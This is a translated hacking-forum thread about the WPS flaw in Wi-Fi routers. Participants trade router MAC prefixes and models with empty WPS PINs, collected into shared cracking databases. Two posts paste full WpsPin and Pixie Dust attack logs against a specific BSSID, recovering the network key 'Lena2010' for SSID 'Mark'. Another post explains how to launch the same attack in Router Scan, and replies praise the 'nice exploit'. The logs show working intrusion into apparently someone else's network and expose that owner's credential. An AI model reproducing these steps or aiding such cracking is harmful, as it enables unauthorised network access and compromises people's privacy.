Vulnerability in the Wi-Fi Protected Setup protocol

Discussion in 'Wireless Technologies/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. maus

    D4:60:E3 - MTS S1010 -p ""
     
  2. Veil

    Then install Fluins, test it on that, and tell us how it went.
     
  3. binarymaster

    Added to RS / 3WiFi. ;)
     
  4. maus

    9c:d6:43 - DSL-2640U -p "" ;)
     
  5. binarymaster

    Hm... this is the first time I've heard of a D-Link DSL-2640U having an empty PIN.

    Could I get the full log? (preferably from RS)
     
  6. sergey-yo

    I don't get it, how do you scan Wi-Fi with RS?
     
  7. binarymaster

    What's unclear about it? It's all easy and simple! :)

    https://forum.antichat.ru/posts/4132727/
     
  8. maus

    - damn, you're getting in the way of my mining.
    - no time to try it in RS.
    - proof 1
    Apple@IPHONE:#_> WpsPin -PIN -SSID Mark -BSSID 9C:D6:43:3C:61:D2
    [+] Тестируем пин в Mark 9C:D6:43:3C:61:D2 (22.12.2017 21:53:43)
    [+] Ар Найдено
    [+] Асоциация с точкой доступа
    [+] Запуск протокола
    [<] Поступила M1
    [>] Отправка M2
    [<] Поступила M3
    [>] Отправка M4
    [<] Поступила M5
    [>] Отправка M6
    [<] Поступила M7
    [>] Отправка WSC NACK
    [*] Действительный Pin:
    [#] Сетевой ключ: Lena2010
    Apple@IPHONE:#_>
    - proof 2
    [​IMG]
     
  9. binarymaster

    Actually, it's no harder / no slower (sometimes even faster).
    OK, accepted. :)
     
  10. maus

    - sorry, it's a new system, haven't installed RS yet.
    - proof 1
    [*] Audit started.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin "00000000"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 46D4E11158808F2B35BA2F300FEA3B96
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: D-Link Systems
    [*] Model Name: DSL-2640U
    [*] Model Number: DSL-2640U
    [*] Serial Number: 123456789012347
    [*] Device Name: DSL-2640U
    [*] Sending WPS Message M2...
    [*] R-Nonce: C2F0DF8AA8F05A07D827AD4C8F4DDC79
    [*] PKR: 32E291D376075D8366CC817D1F94D96173EE113EC6809A757F0395F764D371E904BBECED559586BBCF1199E32AC7B98E36D5170C9682AEACC75DF5FE92D90796DC571647EAA655A88CBC959A6F06939B60864F1B14C0B80A22B4D7D28D25FECF53F0E774654A8C15A5D1266F9E2673CCF82A91A1947BE92D4F4101DDE52DBC16920A767E42D148624D87F7FD8128952B6B92CBB128918FE2C116FDE0B65092DD80E109FC63B8E8AFD2865856AE6951C5111E523A786076A47F31A87E3B770D16
    [*] AuthKey: 43880ABF2A78AC69CDB442316C23674E2FFD1412F9BA47EE710B95B71790EB2F
    [*] Received WPS Message M3.
    [*] E-Hash1: 021D8FE204133B1A34329E1879BCC5FFD360ACAED5C9BB0B703435D89ED6CB36
    [*] E-Hash2: 021D8FE204133B1A34329E1879BCC5FFD360ACAED5C9BB0B703435D89ED6CB36
    [*] This AP is potentially vulnerable to the "empty string" pin.
    [*] To specify <empty> pin, add empty line to PINs list and disable checksum calculation.
    [*] Also in this case the pin can have two same halfs (e.g. 00000000).
    [*] Sending WPS Message M4...
    [*] Received WSC NACK.
    [-] Error: Wrong PIN code.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Starting Pixie Dust attack...
    [*] Mode: 3 (RTL819x)
    [*] PRNG Seed: 129363 (01/02/70 11:56:03 UTC)
    [*] PSK1: B50D84B4E0853D16866FC69ECC3994D2
    [*] PSK2: 238B2A05808F5160E4A5FBEE928A5124
    [*] E-S1: 34E7C38C0D8E249F5C8A5144791DFDC7
    [*] E-S2: 34E7C38C0D8E249F5C8A5144791DFDC7
    [+] WPS PIN: <empty>
    [*] Reconnecting...
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 6FDDC3A837A65E132563555879A60ED0
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: BEE989DE24D8622EF4246D22FF0A734D
    [*] PKR: FFFCD03E796D344159E72A59512034D9D06352598579EBE84DF96E45F552DC692EA64460CF1B415A979BDE4FE0160836A7F961B981B42EB703106E1A824A7863A6ACDE9D4F724555B7A1EF0EDCD81B9BF733F22209B2D6BBC99886916F3CDC7D43C81986F1BC025335A1EA13B5F0ED24729B6B04A3AC13B397D5D8593D202453073C0F79DCCD0E9F1CC0986509AC277C2503E9FE734835008C1CAD5C52C850EFC7C2B2237F8709964B30A00DC9BBC1AB8162B6D2F741E29CA52A25EB1183CA67
    [*] AuthKey: 746DAD2AEB2A9EC286B3E7983AF9746B654CB0F8020856592D2463E847D6FAB1
    [*] Received WPS Message M3.
    [*] E-Hash1: BF19BACCE524CFAF0E7D1C26FA1E27A025963C674E03ED61FC8E9CF67D5A7571
    [*] E-Hash2: BF19BACCE524CFAF0E7D1C26FA1E27A025963C674E03ED61FC8E9CF67D5A7571
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [+] WPS PIN: <empty>
    [+] SSID: Mark
    [+] Key: Lena2010
    [+] Key Index: 1
    [*] Audit stopped.
    - proof 2
    [​IMG]
     
  11. binarymaster

    Impressive, thanks! :) Already added it to RS and 3WiFi.
     
  12. rdpstore555

    nice exploit
     
  13. Alexandr17

    I don't have that Wireless Audit Companion in my arsenal. Googled it, couldn't find it. Guys, if it's not too much trouble, please drop a link.
     
  14. maus

    - it's in Router Scan -> "Wireless Networks" tab -> right-click the access point -> "Obtain key with WPS..." - and it will appear.
    [​IMG]
     
  15. Alexandr17

    You have a beta version. 2.53 doesn't have that option. Not a problem, really. Thanks for the answer.
     
  16. maus

    - it does say v2.60 Beta, the latest.
     
  17. binarymaster

    You should have used the forum search instead of googling:

    https://forum.antichat.ru/posts/4156329

    Because beta versions are only posted here. ;)
     
  18. Alexandr17

    Bro, I already found it. Thanks. Yes, I know, of course. But the first post there has the old 2.53, and there are a lot of posts in the thread. I already found it on the forum. And the link to the new release on the official site leads to Antichat anyway. Thanks for your work. We'll be testing.
     
  19. pro100boy

    Please tell me the WPS PIN, thanks
     


  20. Alexandr17

    The program found this router's PIN for me, and the key as well. But I don't remember the model. And not on the first try, either. There were a lot of locks.
     